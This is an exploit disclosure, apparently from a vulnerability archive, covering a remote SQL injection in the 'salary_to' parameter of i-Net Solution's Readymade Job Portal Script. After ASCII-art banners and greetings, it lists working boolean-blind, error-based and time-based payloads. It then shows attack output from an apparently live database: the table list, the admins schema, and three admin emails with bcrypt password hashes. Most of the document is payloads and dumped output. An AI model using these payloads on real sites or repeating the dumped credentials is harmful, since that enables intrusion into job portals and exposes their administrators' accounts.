Authored by CraCkEr

Readymade Job Portal Script suffers from a remote SQL injection vulnerability. The researcher requested version information from the vendor while reporting the vulnerability but the company has been unresponsive.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr │ │ :
│ Website : i-netsolution.com │ │ │
│ Vendor : i-Net Solution │ │ │
│ Software : Readymade Job Portal Script │ │ Job Portal is a website that serves │
│ Vuln Type: Remote SQL Injection │ │ as a bridge between employers │
│ Method : GET │ │ and job seekers │
│ Impact : Database Access │ │ │
│ │ │ │
│────────────────────────────────────────────┘ └─────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, chamanwal, ix7

CryptoJob (Twitter) twitter.com/CryptozJob

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘


GET parameter 'salary_to' is vulnerable.

---
Parameter: salary_to (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=&salary_from=222&salary_to=333) AND 3040=3040 AND (4873=4873

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: search=&salary_from=222&salary_to=333) AND (SELECT 3022 FROM(SELECT COUNT(*),CONCAT(0x71706a7671,(SELECT (ELT(3022=3022,1))),0x7162716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (1802=1802

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=&salary_from=222&salary_to=333) AND (SELECT 5992 FROM (SELECT(SLEEP(10)))wrGn) AND (8437=8437
---

[+] Starting the Attack


[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0 (MariaDB fork)


[INFO] fetching current database
current database: 'theminsall_jobportal_db'


[INFO] fetching tables for database: 'theminsall_jobportal_db'

Database: theminsall_jobportal_db
[72 tables]
+----------------------------------+
| admin_password_resets |
| admins |
| applicant_messages |
| blog_categories |
| blogs |
| career_levels |
| cities |
| cms |
| cms_content |
| companies |
| company_messages |
| company_password_resets |
| contact_messages |
| countries |
| countries_details |
| degree_levels |
| degree_types |
| failed_jobs |
| faqs |
| favourite_applicants |
| favourites_company |
| favourites_job |
| functional_areas |
| genders |
| industries |
| job_alerts |
| job_apply |
| job_apply_rejected |
| job_experiences |
| job_shifts |
| job_skills |
| job_titles |
| job_types |
| jobs |
| language_levels |
| languages |
| major_subjects |
| manage_job_skills |
| marital_statuses |
| migrations |
| ownership_types |
| packages |
| password_resets |
| payu_transactions |
| profile_cvs |
| profile_education_major_subjects |
| profile_educations |
| profile_experiences |
| profile_languages |
| profile_projects |
| profile_skills |
| profile_summaries |
| queue_jobs |
| report_abuse_company_messages |
| report_abuse_messages |
| result_types |
| roles |
| salary_periods |
| send_to_friend_messages |
| seo |
| site_settings |
| sliders |
| states |
| subscriptions |
| testimonials |
| unlocked_users |
| user_messages |
| users |
| videos |
| widget_pages |
| widgets |
| widgets_data |
+----------------------------------+


[INFO] fetching columns for table 'admins' in database 'theminsall_jobportal_db'

Database: theminsall_jobportal_db
Table: admins
[8 columns]
+----------------+------------------+
| Column | Type |
+----------------+------------------+
| created_at | timestamp |
| email | varchar(191) |
| id | int(10) unsigned |
| name | varchar(191) |
| password | varchar(191) |
| remember_token | varchar(100) |
| role_id | int(11) |
| updated_at | timestamp |
+----------------+------------------+


[INFO] fetching entries of column(s) 'email,id,name,password' for table 'admins' in database 'theminsall_jobportal_db'

Database: theminsall_jobportal_db
Table: admins
[3 entries]
+----+--------------------+--------------------------------------------------------------+-----------+
| id | email | password | name |
+----+--------------------+--------------------------------------------------------------+-----------+
| 3 | [email protected] | $2y$10$47ig/2wfYDc6EVg0iVnvp.l.jC0APqEVUjR7P6PFYTEhbNFzHPJ66 | Buyer |
| 4 | [email protected] | $2y$10$uxtmaI.4Xrb3EEaLW6uvBuOKXyWCNtZ05pQFMwd6Jd1G0k9ZlKV/C | Sub Admin |
| 5 | [email protected] | $2y$10$AvprFLS9PQXUs.3QVwyYZejm4FVYlKM02.nykVF.dVxS9D82I8ZLG | Admin |
+----+--------------------+--------------------------------------------------------------+-----------+
Possible Algorithms: bcrypt $2*$, Blowfish (Unix)


[-] Done